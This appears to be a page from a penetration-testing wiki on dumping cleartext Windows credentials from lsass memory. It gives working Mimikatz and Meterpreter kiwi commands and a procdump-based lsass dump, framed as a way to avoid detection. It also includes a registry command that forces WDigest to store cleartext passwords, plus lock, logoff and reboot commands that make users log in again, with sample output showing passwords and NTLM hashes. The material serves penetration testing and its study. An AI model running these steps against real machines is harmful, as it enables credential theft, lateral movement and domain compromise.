Retrieve Windows passwords

This page deals with retrieving windows clear text credentials from memory and WDigest.

Introduction

Retrieving Windows clear text password allows an attacker testing for password reuse, moving laterally, getting foothold on a domain, etc.

Retrieve clear text passwords from memory

Windows historically stored cleartext passwords in RAM, with lsass process. It allows users with admin privileges to dump clear text passwords from memory with tools like Mimikatz, wce, etc.

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
[...]
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
[...]

If you use Meterpreter on Win10 / Win2016, the only thing that works is Kiwi WDigest module.

meterpreter > load kiwi 
Loading extension kiwi...

  .#####.   mimikatz 2.1.1 20170608 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'    Ported to Metasploit by OJ Reeves `TheColonial` * * */

Success.
meterpreter > creds_wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

Username    Domain     Password
--------    ------     --------
(null)      (null)     (null)
WIN01$      WORKGROUP  (null)
localadmin  WIN01      L0c4l4dm1n

Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.

Minidump

To avoid being detected during assessments, we can use Minidump technic.

It consists in dumping lsass process on the target computer with a legit tool (Procdump by Sysinternals), and parse the dump to retrieve passwords with Mimikatz locally on the attacker machine.

On the attacker machine:

C:\WINDOWS\Sysinternals>procdump -accepteula -ma lsass.exe lsass.dmp
 
ProcDump v5.14 - Writes process dump files
Copyright (C) 2009-2013 Mark Russinovich
Sysinternals - www.sysinternals.com
With contributions from Andrew Richards
 
Writing dump file C:\WINDOWS\Sysinternals\lsass.dmp ...
Writing 48MB. Estimated time (less than) 1 second.
Dump written.

To succesfully extract passwords from this dump, retrieve it locally on a machine with the same major version and the same architecture than the victime machine.

Then use Mimikatz:

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
 
mimikatz # sekurlsa::logonPasswords
 
Authentication Id : 0 ; 141237
User Name         : sekur_000
Domain            : WINDOWS-8
        msv :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
        tspkg :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * Password : waza1234/
        wdigest :
         * Username : sekurlsa@live.fr
         * Domain   : MicrosoftAccount
         * Password : waza1234/

Since Mimikatz Nostalgia (2019/05/04), you can parse every dumps with every Windows version/architecture.

WDigest

You can force Windows to store cleartext credentials in memory by simply modifying the value of the WDigest reg key. Clear text passwords will be stored anew once users connect again.

To enable it, change the key value to 1:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1

To disable it, change the key value to 0:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 0

To take effect, conditions are required :

Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
- Adding requires lock
- Removing requires signout
Win10:
- Adding requires signout
- Removing requires signout
Win2016:
- Adding requires lock
- Removing requires reboot

Lock, signout, and reboot from CMD

To lock a session, type:

rundll32.exe user32.dll,LockWorkStation

To signout, type:

query session
logoff <sessionToClose_Number>

To reboot, type:

shutdown /r /t 0

References

PreviousExtracting Credentials NextRetrieve Windows hashes

Last updated 4 years ago